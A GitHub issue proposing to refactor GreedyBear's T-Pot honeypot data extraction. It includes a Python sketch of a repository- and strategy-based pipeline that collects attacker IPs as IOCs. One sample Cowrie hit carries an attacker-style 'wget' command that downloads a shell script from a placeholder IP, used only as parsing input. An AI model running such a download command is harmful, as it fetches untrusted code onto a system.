
Rework extraction process

Open • regulartim opened this issue 1 week ago • 0 comments

The process of extracting data from T-Pot and writing it into our database is one of the most important parts of GreedyBear. However, it has some problems:

  • it is not very testable: many functions and methods depend directly on the Elastic Stack and/or the GreedyBear database, which makes them hard to test when these data sources are missing
  • classes like ExtractAttacks have many different responsibilities and should be split up into separate service classes
  • the special treatment of Log4j and Cowrie is deeply baked into the process (although Log4j is not that relevant anymore)

I am currently working on an improved process following some best practices:

  • repository pattern: repositories handle data access without containing any processing logic
  • single responsibility: every class in the process has one clear and recognizable responsibility
  • dependency injection: dependencies are injected through constructors which makes testing much easier
  • strategy pattern: makes it easier to add new "special treatment" for honeypots
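The four practices above fit together roughly as in the following Python sketch. It is a minimal illustration under stated assumptions, not the code from the upcoming PR. Every class name (`HitRepository`, `IocRepository`, `ExtractionStrategy`, `CowrieStrategy`, `ExtractionPipeline`) and the Cowrie rule are hypothetical. In-memory repositories stand in for Elasticsearch and the database.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, Protocol

# NOTE: all names below are hypothetical illustrations, not GreedyBear's actual classes.


@dataclass
class Hit:
    """A single honeypot log entry (simplified, assumed shape)."""
    honeypot: str
    src_ip: str
    payload: str = ""


class HitRepository(Protocol):
    """Repository: data access only (would wrap Elasticsearch in production)."""
    def fetch_hits(self) -> Iterable[Hit]: ...


class IocRepository(Protocol):
    """Repository: data access only (would wrap the database in production)."""
    def save(self, ip: str, honeypot: str) -> None: ...


class ExtractionStrategy(Protocol):
    """Strategy: one implementation per honeypot that needs special treatment."""
    def extract(self, hit: Hit) -> list[str]: ...


class GenericStrategy:
    """Default strategy: the attacker's source IP is the only IOC."""
    def extract(self, hit: Hit) -> list[str]:
        return [hit.src_ip]


class CowrieStrategy:
    """Assumed Cowrie rule: also collect IPs that appear in the command payload."""
    def extract(self, hit: Hit) -> list[str]:
        found = [hit.src_ip]
        # Split URLs like http://203.0.113.7/x.sh into separate tokens.
        for token in hit.payload.replace("/", " ").split():
            try:
                found.append(str(ipaddress.ip_address(token)))
            except ValueError:
                pass  # token is not an IP address
        return found


class ExtractionPipeline:
    """Single responsibility: orchestrate the steps; collaborators are injected."""
    def __init__(self, hits: HitRepository, iocs: IocRepository,
                 strategies: dict[str, ExtractionStrategy],
                 default: ExtractionStrategy) -> None:
        self._hits = hits
        self._iocs = iocs
        self._strategies = strategies
        self._default = default

    def run(self) -> int:
        """Extract IOCs from every hit, persist them, and return how many were saved."""
        saved = 0
        for hit in self._hits.fetch_hits():
            strategy = self._strategies.get(hit.honeypot, self._default)
            for ip in strategy.extract(hit):
                self._iocs.save(ip, hit.honeypot)
                saved += 1
        return saved


# In-memory fakes: no Elastic Stack or database needed, e.g. in unit tests.
class InMemoryHits:
    def __init__(self, hits: Iterable[Hit]) -> None:
        self._hits = list(hits)

    def fetch_hits(self) -> Iterable[Hit]:
        return list(self._hits)


class InMemoryIocs:
    def __init__(self) -> None:
        self.saved: list[tuple[str, str]] = []

    def save(self, ip: str, honeypot: str) -> None:
        self.saved.append((ip, honeypot))


hits = InMemoryHits([
    Hit("Heralding", "198.51.100.1"),
    Hit("Cowrie", "198.51.100.2", "wget http://203.0.113.7/x.sh"),
])
iocs = InMemoryIocs()
pipeline = ExtractionPipeline(hits, iocs, {"Cowrie": CowrieStrategy()}, GenericStrategy())
count = pipeline.run()
```

The pipeline only depends on the repository and strategy interfaces. A test can therefore run it without the Elastic Stack or the database. Supporting another honeypot's special treatment then means registering one more strategy rather than editing the pipeline itself.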

I will soon open a PR that contains the most profound changes to the logic. After that code is merged, I would also like to streamline the Cowrie extraction process and add end-to-end pipeline tests, but I'll open separate issues for that.

regulartim • Dec 17 '25 12:12